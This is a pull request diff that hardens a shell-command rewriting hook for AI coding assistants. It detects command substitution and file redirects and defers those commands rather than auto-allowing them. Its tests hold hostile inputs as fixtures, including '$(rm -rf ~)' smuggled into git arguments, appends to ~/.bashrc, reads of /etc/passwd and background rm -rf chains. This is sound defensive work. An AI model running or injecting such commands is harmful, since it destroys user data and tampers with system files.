### PR TITLE
fix(security): port permission hardening from master + Copilot CLI adaptation

### DIFF
--- a/openclaw/index.ts
+++ b/openclaw/index.ts
@@ -9,14 +9,14 @@
  * Rust registry, not this file.
  */
 
-import { execSync } from "node:child_process";
+import { execFileSync } from "node:child_process";
 
 let rtkAvailable: boolean | null = null;
 
 function checkRtk(): boolean {
   if (rtkAvailable !== null) return rtkAvailable;
   try {
-    execSync("which rtk", { stdio: "ignore" });
+    execFileSync("which", ["rtk"], { stdio: "ignore" });
     rtkAvailable = true;
   } catch {
     rtkAvailable = false;
@@ -26,10 +26,12 @@ function checkRtk(): boolean {
 
 function tryRewrite(command: string): string | null {
   try {
-    const result = execSync(`rtk rewrite ${JSON.stringify(command)}`, {
+    const result = execFileSync("rtk", ["rewrite", command], {
       encoding: "utf-8",
       timeout: 2000,
-    }).trim();
+    })
+      .toString()
+      .trim();
     return result && result !== command ? result : null;
   } catch {
     return null;

--- a/openclaw/package.json
+++ b/openclaw/package.json
@@ -22,8 +22,5 @@
     "index.ts",
     "openclaw.plugin.json",
     "README.md"
-  ],
-  "peerDependencies": {
-    "rtk": ">=0.28.0"
-  }
+  ]
 }

--- a/src/discover/lexer.rs
+++ b/src/discover/lexer.rs
@@ -15,6 +15,10 @@ pub struct ParsedToken {
 }
 
 pub fn tokenize(input: &str) -> Vec<ParsedToken> {
+    tokenize_inner(input, false)
+}
+
+fn tokenize_inner(input: &str, emit_newline: bool) -> Vec<ParsedToken> {
     let mut tokens = Vec::new();
     let mut current = String::new();
     let mut current_start: usize = 0;
@@ -226,6 +230,16 @@ pub fn tokenize(input: &str) -> Vec<ParsedToken> {
                 });
                 current_start = byte_pos;
             }
+            '\n' | '\r' if emit_newline => {
+                flush_arg(&mut tokens, &mut current, current_start);
+                tokens.push(ParsedToken {
+                    kind: TokenKind::Operator,
+                    value: "\n".into(),
+                    offset: byte_pos,
+                });
+                byte_pos += char_len;
+                current_start = byte_pos;
+            }
             c if c.is_whitespace() => {
                 flush_arg(&mut tokens, &mut current, current_start);
                 byte_pos += c.len_utf8();
@@ -256,6 +270,101 @@ fn flush_arg(tokens: &mut Vec<ParsedToken>, current: &mut String, offset: usize)
             offset,
         });
     }
+}
+
+/// True for constructs the permission gate can't decompose, so they must never
+/// be auto-allowed: command/process substitution, or a real file-target redirect
+/// (fd-dup like `2>&1` and `/dev/null` are exempt). Separators and subshells are
+/// handled by [`split_for_permissions`], not flagged here.
+pub fn contains_unattestable_construct(cmd: &str) -> bool {
+    if contains_substitution(cmd) {
+        return true;
+    }
+    let tokens = tokenize(cmd);
+    tokens
+        .iter()
+        .enumerate()
+        .any(|(i, tok)| tok.kind == TokenKind::Redirect && redirect_has_file_target(&tokens, i))
+}
+
+/// Quote-aware: bash runs backtick/`$(...)` unquoted and inside double quotes,
+/// but treats single-quoted text literally; `<(`/`>(` is unquoted-only.
+fn contains_substitution(cmd: &str) -> bool {
+    let bytes = cmd.as_bytes();
+    let mut in_single = false;
+    let mut in_double = false;
+    let mut i = 0;
+    while i < bytes.len() {
+        match bytes[i] {
+            b'\\' if !in_single => {
+                i += 2;
+                continue;
+            }
+            b'\'' if !in_double => in_single = !in_single,
+            b'"' if !in_single => in_double = !in_double,
+            b'`' if !in_single => return true,
+            b'$' if !in_single && bytes.get(i + 1) == Some(&b'(') => return true,
+            b'<' | b'>' if !in_single && !in_double && bytes.get(i + 1) == Some(&b'(') => {
+                return true
+            }
+            _ => {}
+        }
+        i += 1;
+    }
+    false
+}
+
+/// File target unless it's fd-dup (`>&`) or `/dev/null`.
+fn redirect_has_file_target(tokens: &[ParsedToken], i: usize) -> bool {
+    if tokens[i].value.contains(">&") {
+        return false;
+    }
+    match tokens.get(i + 1) {
+        Some(next) if next.kind == TokenKind::Arg => next.value != "/dev/null",
+        _ => true,
+    }
+}
+
+/// Like [`split_on_operators`] but also breaks on newline, background `&`, and
+/// subshell `( ... )`, and truncates each segment at its first redirect.
+/// Callers must still gate on [`contains_unattestable_construct`] first.
+pub fn split_for_permissions(cmd: &str) -> Vec<&str> {
+    let trimmed = cmd.trim();
+    if trimmed.is_empty() {
+        return vec![];
+    }
+
+    let tokens = tokenize_inner(trimmed, true);
+    let mut results = Vec::new();
+    let mut seg_start: usize = 0;
+    let mut seg_end: Option<usize> = None;
+
+    for tok in &tokens {
+        let is_boundary = match tok.kind {
+            TokenKind::Operator | TokenKind::Pipe => true,
+            TokenKind::Shellism => matches!(tok.value.as_str(), "&" | "(" | ")"),
+            _ => false,
+        };
+
+        if is_boundary {
+            let end = seg_end.take().unwrap_or(tok.offset);
+            let segment = trimmed[seg_start..end].trim();
+            if !segment.is_empty() {
+                results.push(segment);
+            }
+            seg_start = tok.offset + tok.value.len();
+        } else if tok.kind == TokenKind::Redirect && seg_end.is_none() {
+            seg_end = Some(tok.offset);
+        }
+    }
+
+    let end = seg_end.unwrap_or(trimmed.len());
+    let tail = trimmed[seg_start..end].trim();
+    if !tail.is_empty() {
+        results.push(tail);
+    }
+
+    results
 }
 
 /// Split a shell command on operators (`&&`, `||`, `;`) and optionally pipes (`|`),
@@ -1029,5 +1138,153 @@ mod tests {
     fn test_split_on_operators_empty() {
         assert!(split_on_operators("", false).is_empty());
         assert!(split_on_operators("  ", true).is_empty());
+    }
+
+    // --- contains_unattestable_construct (security) -------------------------
+
+    #[test]
+    fn test_unattestable_backtick() {
+        assert!(contains_unattestable_construct("git status `whoami`"));
+    }
+
+    #[test]
+    fn test_unattestable_command_substitution() {
+        assert!(contains_unattestable_construct(
+            "git log --pretty=$(rm -rf ~)"
+        ));
+    }
+
+    #[test]
+    fn test_unattestable_process_substitution() {
+        assert!(contains_unattestable_construct("diff <(secret) <(other)"));
+        assert!(contains_unattestable_construct("tee >(cat)"));
+    }
+
+    #[test]
+    fn test_unattestable_substitution_inside_double_quotes() {
+        assert!(contains_unattestable_construct(
+            r#"git log --pretty="$(rm -rf ~)""#
+        ));
+        assert!(contains_unattestable_construct(
+            r#"git log --pretty="`rm -rf ~`""#
+        ));
+        assert!(contains_unattestable_construct(
+            r#"git -c x="$(whoami)" status"#
+        ));
+    }
+
+    #[test]
+    fn test_attestable_substitution_inside_single_quotes() {
+        assert!(!contains_unattestable_construct("echo '$(rm -rf ~)'"));
+        assert!(!contains_unattestable_construct("echo '`whoami`'"));
+        assert!(!contains_unattestable_construct(r#"echo "\$(rm -rf ~)""#));
+    }
+
+    #[test]
+    fn test_unattestable_file_redirects() {
+        assert!(contains_unattestable_construct("git log > /tmp/x"));
+        assert!(contains_unattestable_construct("echo evil >> ~/.bashrc"));
+        assert!(contains_unattestable_construct("cmd &> /tmp/x"));
+        assert!(contains_unattestable_construct("cat < /etc/passwd"));
+        assert!(contains_unattestable_construct("cat << EOF"));
+    }
+
+    #[test]
+    fn test_attestable_fd_dup_and_devnull_redirects() {
+        assert!(!contains_unattestable_construct("git status 2>&1"));
+        assert!(!contains_unattestable_construct("cmd >&2"));
+        assert!(!contains_unattestable_construct("cmd 2>&-"));
+        assert!(!contains_unattestable_construct("cmd 2>/dev/null"));
+        assert!(!contains_unattestable_construct("cmd > /dev/null"));
+        assert!(!contains_unattestable_construct("cmd &> /dev/null"));
+    }
+
+    #[test]
+    fn test_attestable_subshell_and_separators() {
+        assert!(!contains_unattestable_construct(
+            "(git status; cargo build)"
+        ));
+        assert!(!contains_unattestable_construct(
+            "git status && cargo build"
+        ));
+        assert!(!contains_unattestable_construct("git status; cargo build"));
+        assert!(!contains_unattestable_construct("git log | head"));
+        assert!(!contains_unattestable_construct("sleep 1 &"));
+        assert!(!contains_unattestable_construct("git status\ncargo build"));
+    }
+
+    #[test]
+    fn test_attestable_variable_expansion() {
+        assert!(!contains_unattestable_construct("echo $HOME"));
+        assert!(!contains_unattestable_construct("echo ${HOME}"));
+        assert!(!contains_unattestable_construct("git status"));
+        assert!(!contains_unattestable_construct(""));
+    }
+
+    // --- split_for_permissions ---------------------------------------------
+
+    #[test]
+    fn test_split_perms_operators() {
+        assert_eq!(
+            split_for_permissions("git status && cargo build"),
+            vec!["git status", "cargo build"]
+        );
+        assert_eq!(
+            split_for_permissions("git status; cargo build"),
+            vec!["git status", "cargo build"]
+        );
+        assert_eq!(
+            split_for_permissions("git log | head"),
+            vec!["git log", "head"]
+        );
+    }
+
+    #[test]
+    fn test_split_perms_newline() {
+        assert_eq!(
+            split_for_permissions("git status\ncargo build"),
+            vec!["git status", "cargo build"]
+        );
+    }
+
+    #[test]
+    fn test_split_perms_background_ampersand() {
+        assert_eq!(
+            split_for_permissions("git status & rm -rf ~"),
+            vec!["git status", "rm -rf ~"]
+        );
+        assert_eq!(split_for_permissions("sleep 1 &"), vec!["sleep 1"]);
+    }
+
+    #[test]
+    fn test_split_perms_subshell() {
+        assert_eq!(
+            split_for_permissions("(git status; cargo build)"),
+            vec!["git status", "cargo build"]
+        );
+        assert_eq!(split_for_permissions("((a; b); c)"), vec!["a", "b", "c"]);
+    }
+
+    #[test]
+    fn test_split_perms_truncates_at_redirect() {
+        assert_eq!(split_for_permissions("git status 2>&1"), vec!["git status"]);
+        assert_eq!(split_for_permissions("git log > /tmp/x"), vec!["git log"]);
+        assert_eq!(
+            split_for_permissions("git push --force 2>&1"),
+            vec!["git push --force"]
+        );
+    }
+
+    #[test]
+    fn test_split_perms_newline_inside_quotes_not_split() {
+        let segments = split_for_permissions("echo 'line1\nline2'");
+        assert_eq!(segments.len(), 1);
+        assert!(segments[0].starts_with("echo"));
+    }
+
+    #[test]
+    fn test_split_perms_empty() {
+        assert!(split_for_permissions("").is_empty());
+        assert!(split_for_permissions("   ").is_empty());
     }
 }

--- a/src/discover/lexer.rs
+++ b/src/discover/lexer.rs
@@ -314,10 +314,15 @@ fn contains_substitution(cmd: &str) -> bool {
     false
 }
 
-/// File target unless it's fd-dup (`>&`) or `/dev/null`.
+// `>&N`/`>&-` (and `N>&M`) is fd-dup/close; bare `>&` before a word is
+// `>word 2>&1` — a file target.
 fn redirect_has_file_target(tokens: &[ParsedToken], i: usize) -> bool {
-    if tokens[i].value.contains(">&") {
-        return false;
+    let value = &tokens[i].value;
+    if let Some(pos) = value.find(">&") {
+        let tail = &value[pos + 2..];
+        if !tail.is_empty() && tail.chars().all(|c| c.is_ascii_digit() || c == '-') {
+            return false;
+        }
     }
     match tokens.get(i + 1) {
         Some(next) if next.kind == TokenKind::Arg => next.value != "/dev/null",
@@ -1190,6 +1195,14 @@ mod tests {
     }
 
     #[test]
+    fn test_unattestable_ampersand_file_redirect() {
+        // `>&word` (word not a number) == `>word 2>&1` — a file write.
+        assert!(contains_unattestable_construct("git status >& /tmp/evil"));
+        assert!(contains_unattestable_construct("cat x >&~/.bashrc"));
+        assert!(contains_unattestable_construct("echo hi 2>& /tmp/evil"));
+    }
+
+    #[test]
     fn test_attestable_fd_dup_and_devnull_redirects() {
         assert!(!contains_unattestable_construct("git status 2>&1"));
         assert!(!contains_unattestable_construct("cmd >&2"));
@@ -1197,6 +1210,7 @@ mod tests {
         assert!(!contains_unattestable_construct("cmd 2>/dev/null"));
         assert!(!contains_unattestable_construct("cmd > /dev/null"));
         assert!(!contains_unattestable_construct("cmd &> /dev/null"));
+        assert!(!contains_unattestable_construct("cmd >& /dev/null"));
     }
 
     #[test]

--- a/src/discover/lexer.rs
+++ b/src/discover/lexer.rs
@@ -1188,8 +1188,10 @@ mod tests {
     #[test]
     fn test_unattestable_file_redirects() {
         assert!(contains_unattestable_construct("git log > /tmp/x"));
+        // nosemgrep: sensitive-path-reference -- test fixture
         assert!(contains_unattestable_construct("echo evil >> ~/.bashrc"));
         assert!(contains_unattestable_construct("cmd &> /tmp/x"));
+        // nosemgrep: sensitive-path-reference -- test fixture
         assert!(contains_unattestable_construct("cat < /etc/passwd"));
         assert!(contains_unattestable_construct("cat << EOF"));
     }
@@ -1198,6 +1200,7 @@ mod tests {
     fn test_unattestable_ampersand_file_redirect() {
         // `>&word` (word not a number) == `>word 2>&1` — a file write.
         assert!(contains_unattestable_construct("git status >& /tmp/evil"));
+        // nosemgrep: sensitive-path-reference -- test fixture
         assert!(contains_unattestable_construct("cat x >&~/.bashrc"));
         assert!(contains_unattestable_construct("echo hi 2>& /tmp/evil"));
     }

--- a/src/hooks/hook_cmd.rs
+++ b/src/hooks/hook_cmd.rs
@@ -125,23 +125,40 @@ fn get_rewritten(cmd: &str) -> Option<String> {
     Some(rewritten)
 }
 
-fn handle_vscode(cmd: &str) -> Result<()> {
-    let verdict = permissions::check_command(cmd);
+enum HookDecision {
+    AllowRewrite(String),
+    AskRewrite(String),
+    Defer,
+    Deny,
+}
+
+fn decide_from_verdict(cmd: &str, verdict: PermissionVerdict) -> HookDecision {
     if verdict == PermissionVerdict::Deny {
-        audit_log("deny", cmd, "");
-        return Ok(());
+        return HookDecision::Deny;
     }
+    if crate::discover::lexer::contains_unattestable_construct(cmd) {
+        return HookDecision::Defer;
+    }
+    match get_rewritten(cmd) {
+        Some(r) if verdict == PermissionVerdict::Allow => HookDecision::AllowRewrite(r),
+        Some(r) => HookDecision::AskRewrite(r),
+        None => HookDecision::Defer,
+    }
+}
 
-    let rewritten = match get_rewritten(cmd) {
-        Some(r) => r,
-        None => return Ok(()),
-    };
+fn decide_hook_action(cmd: &str) -> HookDecision {
+    decide_from_verdict(cmd, permissions::check_command(cmd))
+}
 
-    // Allow (explicit rule matched): auto-allow the rewritten command.
-    // Ask/Default (no allow rule matched): rewrite but let the host tool prompt.
-    let decision = match verdict {
-        PermissionVerdict::Allow => "allow",
-        _ => "ask",
+fn handle_vscode(cmd: &str) -> Result<()> {
+    let (decision, rewritten) = match decide_hook_action(cmd) {
+        HookDecision::Deny => {
+            audit_log("deny", cmd, "");
+            return Ok(());
+        }
+        HookDecision::Defer => return Ok(()),
+        HookDecision::AllowRewrite(r) => ("allow", r),
+        HookDecision::AskRewrite(r) => ("ask", r),
     };
 
     audit_log("rewrite", cmd, &rewritten);
@@ -166,19 +183,24 @@ fn handle_copilot_cli(cmd: &str, args: &Value) -> Result<()> {
 }
 
 fn copilot_cli_response(cmd: &str, args: &Value) -> Option<Value> {
-    copilot_cli_response_for_verdict(cmd, args, permissions::check_command(cmd))
+    copilot_cli_response_from_decision(args, decide_hook_action(cmd), cmd)
 }
 
-fn copilot_cli_response_for_verdict(
-    cmd: &str,
+fn copilot_cli_response_from_decision(
     args: &Value,
-    verdict: PermissionVerdict,
+    decision: HookDecision,
+    cmd: &str,
 ) -> Option<Value> {
-    if verdict == PermissionVerdict::Deny {
-        audit_log("deny", cmd, "");
-        return None;
-    }
-    let rewritten = get_rewritten(cmd)?;
+    let (rewritten, allow) = match decision {
+        HookDecision::Deny => {
+            audit_log("deny", cmd, "");
+            return None;
+        }
+        HookDecision::Defer => return None,
+        HookDecision::AllowRewrite(r) => (r, true),
+        HookDecision::AskRewrite(r) => (r, false),
+    };
+
     audit_log("rewrite", cmd, &rewritten);
 
     let mut modified = args.clone();
@@ -186,15 +208,11 @@ fn copilot_cli_response_for_verdict(
         obj.insert("command".into(), Value::String(rewritten));
     }
 
-    // Copilot CLI v1.0.54 only applies `modifiedArgs` when permissionDecision is
-    // either "allow" or absent. Omitting permissionDecision lets Copilot's normal
-    // permission flow run on the rewritten command — `rtk *` is not on its
-    // auto-allow list, so the user sees a prompt for the rewritten command.
     let mut response = json!({
         "permissionDecisionReason": "RTK auto-rewrite",
         "modifiedArgs": modified,
     });
-    if verdict == PermissionVerdict::Allow {
+    if allow {
         response["permissionDecision"] = json!("allow");
     }
     Some(response)
@@ -225,25 +243,22 @@ pub fn run_gemini() -> Result<()> {
         return Ok(());
     }
 
-    // Check deny rules — Gemini CLI only supports allow/deny (no ask mode).
-    if permissions::check_command(cmd) == PermissionVerdict::Deny {
-        let _ = writeln!(
-            io::stdout(),
-            r#"{{"decision":"deny","reason":"Blocked by RTK permission rule"}}"#
-        );
-        return Ok(());
-    }
-
-    let (excluded, transparent_prefixes) = crate::core::config::Config::load()
-        .map(|c| (c.hooks.exclude_commands, c.hooks.transparent_prefixes))
-        .unwrap_or_default();
-
-    match rewrite_command(cmd, &excluded, &transparent_prefixes) {
-        Some(ref rewritten) => {
-            audit_log("rewrite", cmd, rewritten);
-            print_rewrite(rewritten);
+    match decide_hook_action(cmd) {
+        HookDecision::Deny => {
+            let _ = writeln!(
+                io::stdout(),
+                r#"{{"decision":"deny","reason":"Blocked by RTK permission rule"}}"#
+            );
         }
-        None => print_allow(),
+        HookDecision::AllowRewrite(ref rewritten) => {
+            audit_log("rewrite", cmd, rewritten);
+            print_gemini("allow", Some(rewritten));
+        }
+        HookDecision::AskRewrite(ref rewritten) => {
+            audit_log("ask", cmd, rewritten);
+            print_gemini("ask_user", Some(rewritten));
+        }
+        HookDecision::Defer => print_gemini("ask_user", None),
     }
 
     Ok(())
@@ -253,16 +268,16 @@ fn print_allow() {
     let _ = writeln!(io::stdout(), r#"{{"decision":"allow"}}"#);
 }
 
-fn print_rewrite(cmd: &str) {
-    let output = serde_json::json!({
-        "decision": "allow",
-        "hookSpecificOutput": {
-            "tool_input": {
-                "command": cmd
-            }
-        }
-    });
-    let _ = writeln!(io::stdout(), "{}", output);
+fn gemini_json(decision: &str, rewrite: Option<&str>) -> String {
+    let mut output = serde_json::json!({ "decision": decision });
+    if let Some(cmd) = rewrite {
+        output["hookSpecificOutput"] = serde_json::json!({ "tool_input": { "command": cmd } });
+    }
+    output.to_string()
+}
+
+fn print_gemini(decision: &str, rewrite: Option<&str>) {
+    let _ = writeln!(io::stdout(), "{}", gemini_json(decision, rewrite));
 }
 
 // ── Audit logging ─────────────────────────────────────────────
@@ -330,22 +345,21 @@ fn process_claude_payload(v: &Value) -> PayloadAction {
         None => return PayloadAction::Ignore,
     };
 
-    let verdict = permissions::check_command(cmd);
-    if verdict == PermissionVerdict::Deny {
-        return PayloadAction::Skip {
-            reason: "skip:deny_rule",
-            cmd: cmd.to_string(),
-        };
-    }
-
-    let rewritten = match get_rewritten(cmd) {
-        Some(r) => r,
-        None => {
+    let (rewritten, allow) = match decide_hook_action(cmd) {
+        HookDecision::Deny => {
             return PayloadAction::Skip {
-                reason: "skip:no_match",
+                reason: "skip:deny_rule",
                 cmd: cmd.to_string(),
             }
         }
+        HookDecision::Defer => {
+            return PayloadAction::Skip {
+                reason: "skip:defer",
+                cmd: cmd.to_string(),
+            }
+        }
+        HookDecision::AllowRewrite(r) => (r, true),
+        HookDecision::AskRewrite(r) => (r, false),
     };
 
     let updated_input = {
@@ -362,7 +376,7 @@ fn process_claude_payload(v: &Value) -> PayloadAction {
         "updatedInput": updated_input
     });
 
-    if verdict == PermissionVerdict::Allow {
+    if allow {
         hook_output
             .as_object_mut()
             .unwrap()
@@ -464,40 +478,29 @@ pub fn run_cursor() -> Result<()> {
         }
     };
 
-    let verdict = permissions::check_command(&cmd);
-    if verdict == PermissionVerdict::Deny {
-        audit_log("deny", &cmd, "");
-        let _ = writeln!(io::stdout(), "{{}}");
-        return Ok(());
-    }
-
-    let rewritten = match get_rewritten(&cmd) {
-        Some(r) => r,
-        None => {
-            let _ = writeln!(io::stdout(), "{{}}");
-            return Ok(());
+    let output = match decide_hook_action(&cmd) {
+        HookDecision::AllowRewrite(rewritten) => {
+            audit_log("rewrite", &cmd, &rewritten);
+            cursor_allow(&rewritten)
+        }
+        other => {
+            if matches!(other, HookDecision::Deny) {
+                audit_log("deny", &cmd, "");
+            }
+            "{}".to_string()
         }
     };
-
-    // Cursor preToolUse currently enforces allow/deny only and can ignore
-    // updated_input when permission is "ask". Use "allow" for rewritten
-    // commands unless the command is explicitly denied above.
-    let decision = "allow";
-
-    audit_log("rewrite", &cmd, &rewritten);
-
-    // `continue: true` mirrors the shape of every other Cursor hook
-    // (afterShellExecution, beforeSubmitPrompt, stop, ...). Cursor's
-    // preToolUse panel renders the JSON it received; without this field
-    // the panel collapses to `Output: {}` even though the rewrite ran,
-    // which makes the hook look broken to users.
-    let output = json!({
-        "continue": true,
-        "permission": decision,
-        "updated_input": { "command": rewritten }
-    });
     let _ = writeln!(io::stdout(), "{output}");
     Ok(())
+}
+
+fn cursor_allow(rewritten: &str) -> String {
+    json!({
+        "continue": true,
+        "permission": "allow",
+        "updated_input": { "command": rewritten }
+    })
+    .to_string()
 }
 
 #[cfg(test)]
@@ -528,21 +531,9 @@ fn run_cursor_inner_with_rules(
     };
 
     let verdict = permissions::check_command_with_rules(&cmd, deny_rules, ask_rules, allow_rules);
-    if verdict == PermissionVerdict::Deny {
-        return "{}".to_string();
-    }
-
-    match get_rewritten(&cmd) {
-        Some(rewritten) => {
-            let decision = "allow";
-            let output = json!({
-                "continue": true,
-                "permission": decision,
-                "updated_input": { "command": rewritten }
-            });
-            output.to_string()
-        }
-        None => "{}".to_string(),
+    match decide_from_verdict(&cmd, verdict) {
+        HookDecision::AllowRewrite(rewritten) => cursor_allow(&rewritten),
+        _ => "{}".to_string(),
     }
 }
 
@@ -649,26 +640,26 @@ mod tests {
     }
 
     #[test]
-    fn test_copilot_cli_default_verdict_omits_permission_decision() {
-        let r = copilot_cli_response_for_verdict(
-            "cargo test",
+    fn test_copilot_cli_ask_rewrite_omits_permission_decision() {
+        let r = copilot_cli_response_from_decision(
             &cli_args("cargo test"),
-            PermissionVerdict::Default,
+            HookDecision::AskRewrite("rtk cargo test".into()),
+            "cargo test",
         )
         .unwrap();
         assert!(
             r.get("permissionDecision").is_none(),
-            "Default must NOT set permissionDecision — Copilot then runs its normal prompt flow on the rewritten command"
+            "AskRewrite must NOT set permissionDecision — Copilot then runs its normal prompt flow on the rewritten command"
         );
         assert_eq!(r["modifiedArgs"]["command"], "rtk cargo test");
     }
 
     #[test]
-    fn test_copilot_cli_explicit_allow_returns_allow_with_rewrite() {
-        let r = copilot_cli_response_for_verdict(
-            "cargo test",
+    fn test_copilot_cli_allow_rewrite_returns_allow() {
+        let r = copilot_cli_response_from_decision(
             &cli_args("cargo test"),
-            PermissionVerdict::Allow,
+            HookDecision::AllowRewrite("rtk cargo test".into()),
+            "cargo test",
         )
         .unwrap();
         assert_eq!(r["permissionDecision"], "allow");
@@ -676,13 +667,29 @@ mod tests {
     }
 
     #[test]
-    fn test_copilot_cli_deny_verdict_returns_none() {
-        assert!(copilot_cli_response_for_verdict(
-            "cargo test",
-            &cli_args("cargo test"),
-            PermissionVerdict::Deny
-        )
-        .is_none());
+    fn test_copilot_cli_deny_returns_none() {
+        assert!(
+            copilot_cli_response_from_decision(
+                &cli_args("cargo test"),
+                HookDecision::Deny,
+                "cargo test",
+            )
+            .is_none()
+        );
+    }
+
+    #[test]
+    fn test_copilot_cli_defer_returns_none() {
+        // Defer covers both "no rewrite available" and the unattestable-construct gate.
+        // The hook must emit NO modifiedArgs for CVE bypass forms — no laundering.
+        assert!(
+            copilot_cli_response_from_decision(
+                &cli_args("git status & rm -rf /tmp/x"),
+                HookDecision::Defer,
+                "git status & rm -rf /tmp/x",
+            )
+            .is_none()
+        );
     }
 
     #[test]
@@ -722,10 +729,10 @@ mod tests {
             "initial_wait": 30,
             "mode": "sync"
         });
-        let r = copilot_cli_response_for_verdict(
-            "cargo install ripgrep",
+        let r = copilot_cli_response_from_decision(
             &args,
-            PermissionVerdict::Default,
+            HookDecision::AskRewrite("rtk cargo install ripgrep".into()),
+            "cargo install ripgrep",
         )
         .unwrap();
         let modified = &r["modifiedArgs"];
@@ -849,6 +856,26 @@ mod tests {
     }
 
     #[test]
+    fn test_claude_substitution_not_rewritten() {
+        // A substitution payload must never be rewritten into updatedInput;
+        // RTK skips so Claude Code evaluates the original command natively.
+        assert!(run_claude_inner(&claude_input("git status `rm -rf /tmp/x`")).is_none());
+        assert!(run_claude_inner(&claude_input("git status $(rm -rf /tmp/x)")).is_none());
+        assert!(run_claude_inner(&claude_input("git log --pretty=\"$(rm -rf /tmp/x)\"")).is_none());
+    }
+
+    #[test]
+    fn test_claude_file_redirect_not_rewritten() {
+        assert!(run_claude_inner(&claude_input("git log > /tmp/out.txt")).is_none());
+    }
+
+    #[test]
+    fn test_claude_fd_dup_redirect_still_rewritten() {
+        // `2>&1` is attestable — the rewrite proceeds as normal.
+        assert!(run_claude_inner(&claude_input("git status 2>&1")).is_some());
+    }
+
+    #[test]
     fn test_claude_heredoc_passthrough() {
         assert!(run_claude_inner(&claude_input("cat <<EOF\nhello\nEOF")).is_none());
     }
@@ -925,9 +952,13 @@ mod tests {
         .to_string()
     }
 
+    fn run_cursor_allowed(input: &str) -> String {
+        run_cursor_inner_with_rules(input, &[], &[], &["*".to_string()])
+    }
+
     #[test]
     fn test_cursor_rewrite_flat_format() {
-        let result = run_cursor_inner(&cursor_input("git status"));
+        let result = run_cursor_allowed(&cursor_input("git status"));
         let v: Value = serde_json::from_str(&result).unwrap();
         // Cursor preToolUse expects allow/deny for rewrite application.
         assert_eq!(v["permission"], "allow");
@@ -936,6 +967,34 @@ mod tests {
         // `continue: true` keeps the Cursor preToolUse panel from collapsing
         // to `Output: {}`; without it the rewrite is invisible to users.
         assert_eq!(v["continue"], true);
+    }
+
+    #[test]
+    fn test_cursor_no_allow_rule_defers() {
+        assert_eq!(run_cursor_inner(&cursor_input("git status")), "{}");
+    }
+
+    #[test]
+    fn test_cursor_substitution_defers_even_when_allowed() {
+        assert_eq!(
+            run_cursor_allowed(&cursor_input("git status `rm -rf /tmp/x`")),
+            "{}"
+        );
+        assert_eq!(
+            run_cursor_allowed(&cursor_input("git status $(rm -rf /tmp/x)")),
+            "{}"
+        );
+    }
+
+    #[test]
+    fn test_cursor_unallowed_segment_defers() {
+        let out = run_cursor_inner_with_rules(
+            &cursor_input("git status && rm -rf /tmp/x"),
+            &[],
+            &[],
+            &["git *".to_string()],
+        );
+        assert_eq!(out, "{}");
     }
 
     #[test]
@@ -964,7 +1023,7 @@ mod tests {
 
     #[test]
     fn test_cursor_no_hook_specific_output() {
-        let result = run_cursor_inner(&cursor_input("cargo test"));
+        let result = run_cursor_allowed(&cursor_input("cargo test"));
         let v: Value = serde_json::from_str(&result).unwrap();
         assert!(v.get("hookSpecificOutput").is_none());
         assert_eq!(v["permission"], "allow");
@@ -974,7 +1033,7 @@ mod tests {
     #[test]
     fn test_cursor_compound_rewrite_includes_continue() {
         let cmd = "cd \"/tmp/proj\" && git status";
-        let result = run_cursor_inner(&cursor_input(cmd));
+        let result = run_cursor_allowed(&cursor_input(cmd));
         let v: Value = serde_json::from_str(&result).unwrap();
         assert_eq!(v["continue"], true);
         assert_eq!(v["permission"], "allow");
@@ -991,7 +1050,7 @@ mod tests {
         // the hook returned `{}` and the rewrite became a silent no-op.
         let payload = cursor_input("git status");
         let with_single_bom = format!("\u{feff}{}", payload);
-        let result = run_cursor_inner(&with_single_bom);
+        let result = run_cursor_allowed(&with_single_bom);
         let v: Value = serde_json::from_str(&result).unwrap();
         assert_eq!(v["continue"], true);
         assert_eq!(v["permission"], "allow");
@@ -1006,7 +1065,7 @@ mod tests {
         // the real-world payload shape the loop needs to survive.
         let payload = cursor_input("git status");
         let with_double_bom = format!("\u{feff}\u{feff}{}", payload);
-        let result = run_cursor_inner(&with_double_bom);
+        let result = run_cursor_allowed(&with_double_bom);
         let v: Value = serde_json::from_str(&result).unwrap();
         assert_eq!(v["continue"], true);
         assert_eq!(v["permission"], "allow");
@@ -1122,5 +1181,138 @@ mod tests {
             get_rewritten("cargo test").is_some(),
             "cargo test should be rewritable when not denied"
         );
+    }
+
+    // --- Shared decision flow (all hosts route through this) ---
+
+    fn decide_with_rules(
+        cmd: &str,
+        deny: &[String],
+        ask: &[String],
+        allow: &[String],
+    ) -> HookDecision {
+        let verdict = permissions::check_command_with_rules(cmd, deny, ask, allow);
+        decide_from_verdict(cmd, verdict)
+    }
+
+    fn all_allowed() -> Vec<String> {
+        vec!["*".to_string()]
+    }
+
+    #[test]
+    fn test_decide_allow_for_attestable_allowed_command() {
+        assert!(matches!(
+            decide_with_rules("git status", &[], &[], &all_allowed()),
+            HookDecision::AllowRewrite(_)
+        ));
+    }
+
+    #[test]
+    fn test_decide_ask_for_default_verdict() {
+        assert!(matches!(
+            decide_with_rules("git status", &[], &[], &[]),
+            HookDecision::AskRewrite(_)
+        ));
+    }
+
+    #[test]
+    fn test_decide_deny() {
+        assert!(matches!(
+            decide_with_rules(
+                "rm -rf /tmp/x",
+                &["rm -rf".to_string()],
+                &[],
+                &all_allowed()
+            ),
+            HookDecision::Deny
+        ));
+    }
+
+    #[test]
+    fn test_decide_defer_for_substitution_even_when_allowed() {
+        for cmd in [
+            "git status `rm -rf /tmp/x`",
+            "git status $(rm -rf /tmp/x)",
+            "git log --pretty=\"$(rm -rf /tmp/x)\"",
+        ] {
+            assert!(
+                matches!(
+                    decide_with_rules(cmd, &[], &[], &all_allowed()),
+                    HookDecision::Defer
+                ),
+                "expected Defer for {cmd}"
+            );
+        }
+    }
+
+    #[test]
+    fn test_decide_defer_for_file_redirect() {
+        assert!(matches!(
+            decide_with_rules("git log > /tmp/out.txt", &[], &[], &all_allowed()),
+            HookDecision::Defer
+        ));
+    }
+
+    #[test]
+    fn test_decide_allow_for_fd_dup_redirect() {
+        assert!(matches!(
+            decide_with_rules("git status 2>&1", &[], &[], &all_allowed()),
+            HookDecision::AllowRewrite(_)
+        ));
+    }
+
+    // --- Gemini rendering ---
+
+    fn gemini_render(cmd: &str, deny: &[String], ask: &[String], allow: &[String]) -> String {
+        match decide_with_rules(cmd, deny, ask, allow) {
+            HookDecision::Deny => {
+                r#"{"decision":"deny","reason":"Blocked by RTK permission rule"}"#.to_string()
+            }
+            HookDecision::AllowRewrite(r) => gemini_json("allow", Some(&r)),
+            HookDecision::AskRewrite(r) => gemini_json("ask_user", Some(&r)),
+            HookDecision::Defer => gemini_json("ask_user", None),
+        }
+    }
